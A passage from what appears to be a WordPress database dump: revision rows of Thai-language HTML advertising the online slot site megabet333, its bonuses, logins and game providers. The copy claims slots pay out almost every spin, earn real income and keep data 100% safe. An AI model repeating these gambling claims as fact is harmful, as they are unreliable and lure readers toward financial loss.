นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-29 03:35:39','2025-10-29 03:35:39','',44,'https://megabet333.biz/?p=174',0,'revision','',0),(175,3,'2025-10-29 03:35:39','2025-10-29 03:35:39','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <a href=\"https://amb18b.com/\"><b>megabet333 </b></a>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>เว็บสล็อตค่ายใหญ่ megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ <strong><a href=\"http://mgbline.com\" target=\"_blank\" rel=\"noopener\">Line Official</a></strong> และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-29 03:35:39','2025-10-29 03:35:39','',44,'https://megabet333.biz/?p=175',0,'revision','',0),(176,3,'2025-10-29 06:22:28','2025-10-29 06:22:28','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-29 06:22:28','2025-10-29 06:22:28','',16,'https://megabet333.biz/?p=176',0,'revision','',0),(177,3,'2025-10-29 06:22:28','2025-10-29 06:22:28','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-29 06:22:28','2025-10-29 